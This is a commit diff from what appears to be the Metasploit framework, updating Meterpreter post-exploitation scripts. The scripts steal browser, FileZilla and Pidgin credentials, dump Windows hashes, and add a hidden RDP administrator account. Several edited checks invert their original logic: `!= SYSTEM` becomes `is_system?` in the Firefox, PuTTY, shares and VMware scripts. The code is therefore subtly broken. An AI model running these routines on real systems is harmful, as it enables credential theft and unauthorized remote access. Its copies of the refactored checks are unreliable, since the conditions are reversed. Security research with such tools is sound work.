Update Meterpreter scripts to use is_system? and make getgui script language independent thru the use of SID for group identification

git-svn-id: file:///home/svn/framework3/trunk@11998 4d416f70-5f16-0410-b530-b9f4589650da

scripts/meterpreter/enum_chrome.rb

@@ -208,7 +208,10 @@ elsif os =~ /(2000|NET|XP)/
 end
 
 usernames = []
-if (uid = client.sys.config.getuid) == "NT AUTHORITY\\SYSTEM"
+
+uid = client.sys.config.getuid
+
+if is_system?
 	print_status "running as SYSTEM, extracting user list..."
 	print_status "(decryption of passwords and credit card numbers will not be possible)"
 	client.fs.dir.foreach(@profiles_path) do |u|

scripts/meterpreter/enum_firefox.rb

@@ -252,7 +252,7 @@ end
 if client.platform =~ /win32|win64/
 	if frfxchk
 		user = @client.sys.config.getuid
-		if user != "NT AUTHORITY\\SYSTEM"
+		if is_system?
 			usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%"))
 			db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
 			if kill_frfx

scripts/meterpreter/enum_powershell_env.rb

@@ -33,7 +33,7 @@ def enum_users
 		profilepath = "\\My Documents\\WindowsPowerShell\\"
 	end
 
-	if user == "NT AUTHORITY\\SYSTEM"
+	if is_system?
 		print_status("Running as SYSTEM extracting user list..")
 		@client.fs.dir.foreach(path4users) do |u|
 			userinfo = {}

scripts/meterpreter/enum_putty.rb

@@ -21,8 +21,8 @@ opts.parse(args) { |opt, idx, val|
 
 def hkcu_base
 	key_base = []
-	user = @client.sys.config.getuid
-	if user != "NT AUTHORITY\\SYSTEM"
+	
+	if is_system?
 		key_base << "HKCU"
 	else
 		key = "HKU\\"

scripts/meterpreter/enum_shares.rb

@@ -76,8 +76,8 @@ if client.platform =~ /win32|64/
 
 	# Enumerate shares being offered
 	enum_conf_shares()
-	user = client.sys.config.getuid
-	if user != "NT AUTHORITY\\SYSTEM"
+	
+	if is_system?
 		mount_history = enum_recent_mounts("HKEY_CURRENT_USER")
 		run_history = enum_run_unc("HKEY_CURRENT_USER")
 	else

scripts/meterpreter/enum_vmware.rb

@@ -101,8 +101,8 @@ def enum_viclient
 			end
 		end
 	end
-	user = @client.sys.config.getuid
-	if user != "NT AUTHORITY\\SYSTEM"
+	
+	if is_system?
 		recentconns = registry_getvaldata("HKCU\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
 		print_status("Recent VI Client Connections:")
 		recentconns.each do |c|

scripts/meterpreter/get_filezilla_creds.rb

@@ -115,7 +115,7 @@ end
 #Function to enumerate the users if running as SYSTEM
 def enum_users(os)
 	users = []
-	user = @client.sys.config.getuid
+	
 	path4users = ""
 	sysdrv = @client.fs.file.expand_path("%SystemDrive%")
 
@@ -127,7 +127,7 @@ def enum_users(os)
 		path2purple = "\\Application Data\\"
 	end
 
-	if user == "NT AUTHORITY\\SYSTEM"
+	if is_system?
 		print_status("Running as SYSTEM extracting user list..")
 		@client.fs.dir.foreach(path4users) do |u|
 			userinfo = {}

scripts/meterpreter/get_pidgin_creds.rb

@@ -145,7 +145,7 @@ end
 #Function to enumerate the users if running as SYSTEM
 def enum_users(os)
 	users = []
-	user = @client.sys.config.getuid
+	
 	path4users = ""
 	sysdrv = @client.fs.file.expand_path("%SystemDrive%")
 
@@ -157,7 +157,7 @@ def enum_users(os)
 		path2purple = "\\Application Data\\"
 	end
 
-	if user == "NT AUTHORITY\\SYSTEM"
+	if is_system?
 		print_status("Running as SYSTEM extracting user list..")
 		@client.fs.dir.foreach(path4users) do |u|
 			userinfo = {}

scripts/meterpreter/getgui.rb

@@ -21,7 +21,6 @@ logs = ::File.join(Msf::Config.log_directory,'scripts', 'getgui')
 @@exec_opts = Rex::Parser::Arguments.new(
 	"-h" => [ false, "Help menu." ],
 	"-e" => [ false, "Enable RDP only." ],
-	"-l" => [ true, "The language switch\n\t\tPossible Options: 'de_DE', 'en_EN' / default is: 'en_EN'" ],
 	"-p" => [ true,  "The Password of the user to add." ],
 	"-u" => [ true,  "The Username of the user to add." ],
 	"-f" => [ true,  "Forward RDP Connection." ]
@@ -35,23 +34,6 @@ def usage
 end
 
 
-def langdetect(lang)
-	if lang != nil
-		print_status("Language set by user to: '#{lang}'")
-	else
-		print_status("Language detection started")
-		lang = client.sys.config.sysinfo['System Language']
-		if lang != nil
-			print_status("\tLanguage detected: #{lang}")
-		else
-			print_error("\tLanguage detection failed, falling back to default 'en_EN'")
-			lang = "en_EN"
-		end
-	end
-	return lang
-rescue::Exception => e
-	print_status("The following Error was encountered: #{e.class} #{e}")
-end
 
 
 def enablerd()
@@ -100,26 +82,11 @@ end
 
 
 
-def addrdpusr(session, username, password, lang)
-	# Changing the group names depending on the selected language
-	case lang
-	when "en_EN"
-		rdu = "Remote Desktop Users"
-		admin = "Administrators"
-	when "en_US"
-		rdu = "Remote Desktop Users"
-		admin = "Administrators"
-	when "de_DE"
-		rdu = "Remotedesktopbenutzer"
-		admin = "Administratoren"
-	when "fr_FR"
-		rdu = "Utilisateurs du Bureau <20> distance"
-		admin = "Administrateurs"
-	else
-		print_error("Could not determine lenguage, defaulting to English!")
-		rdu = "Remote Desktop Users"
-		admin = "Administrators"
-	end
+def addrdpusr(session, username, password)
+		
+	rdu = resolve_sid("S-1-5-32-555")[:name]
+	admin = resolve_sid("S-1-5-32-544")[:name]
+
 
 	print_status "Setting user account for logon"
 	print_status "\tAdding User: #{username} with Password: #{password}"
@@ -159,8 +126,6 @@ frwrd = nil
 		pass = val
 	when "-h"
 		usage
-	when "-l"
-		lang = val
 	when "-f"
 		frwrd = true
 		lport = val
@@ -178,8 +143,8 @@ if client.platform =~ /win32|win64/
 				enabletssrv()
 			end
 			if usr and pass
-				lang = langdetect(lang)
-				addrdpusr(session, usr, pass, lang)
+				
+				addrdpusr(session, usr, pass)
 			end
 			if frwrd == true
 				print_status("Starting the port forwarding at local port #{lport}")

scripts/meterpreter/remotewinenum.rb

@@ -171,7 +171,7 @@ if client.platform =~ /win32|win64/
 
 			# Making sure that is running as System a Username and Password for target machine must be provided
 
-			if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM" && rusr == nil && rpass == nil
+			if is_system? && rusr == nil && rpass == nil
 
 				print_status("Stopped: Running as System and no user provided for connecting to target!!")
 

scripts/meterpreter/winenum.rb

@@ -606,7 +606,7 @@ elsif trgtos =~ /(Windows 2008)/
 	list_exec(commands + win2k8cmd)
 	wmicexec(wmic)
 	findprogs()
-	if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
+	if not is_system?
 		print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.")
 	else
 		gethash()
@@ -621,7 +621,7 @@ elsif trgtos =~ /Windows (Vista|7)/
 	end
 	wmicexec(wmic)
 	findprogs()
-	if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
+	if not is_system?
 		print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.")
 	else
 		gethash()